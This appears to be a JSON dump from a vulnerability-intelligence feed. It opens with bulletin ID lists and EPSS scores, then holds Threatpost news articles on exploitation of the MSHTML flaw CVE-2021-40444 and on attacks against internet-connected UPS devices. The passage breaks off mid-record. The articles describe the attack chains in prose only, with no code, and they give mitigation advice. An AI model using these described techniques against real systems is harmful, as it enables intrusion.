"THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37126", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "epss": [{"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993300000", "modified": "2023-03-17"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1659988328, "score": 1684013406, "epss": 1679179654}, "_internal": {"score_hash": "1dcc91ecdada24907475479970baf941"}}

{"threatpost": [{"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. \u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T17:33:05", "description": "Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are high.\n\nThat\u2019s according to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy, which warned that malicious types are going after internet-connected versions of UPS via default usernames and passwords, mostly \u2013 though vulnerabilities, like the [TLStorm bugs disclosed earlier this month](<https://threatpost.com/zero-click-flaws-ups-critical-infratructure/178810/>) \u2013 are also in the attacker toolbox.\n\n\u201cIn recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,\u201d according to a [Tuesday alert](<https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf>) from CISA (PDF). \u201cLoads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).\u201d\n\nIf attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company\u2019s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.\n\nFurther, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).\n\n\u201cIt\u2019s easy to forget that every device connected to the internet is at increased risk of attack,\u201d Tim Erlin, vice president of strategy at Tripwire, noted via email. \u201cJust because a vendor provides the capability to put a device on the internet, doesn\u2019t mean that it\u2019s set up to be secure. It\u2019s up to each organization to ensure that the systems they deploy are configured securely.\u201d\n\n## **An Easy Fix**\n\nThus, those responsible for UPS upkeep (which CISA noted could include IT staff, building operations people, industrial maintenance workers or third-party contractors from monitoring services) have an easy fix for this one: Enumerating all connected UPSs and similar systems and simply take them offline.\n\nIf maintaining an active IoT connection is a requirement, admins should change the default credentials to a strong user-name-and-password combo \u2013 and preferably, implement multifactor authentication (MFA) too, CISA added. And other mitigations, according to CISA, include ensuring UPSs are behind a virtual private network (VPN), and adopting login timeout/lockout features so that the devices aren\u2019t continually online and open to the world.\n\n\u201cThe use of a default username and password to maliciously access a system isn\u2019t a new technique,\u201d said Erlin. \u201cIf you\u2019re responding to this advisory by updating the credentials for your UPS systems, take the follow-up step to ensure that other systems aren\u2019t using default credentials as well.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, 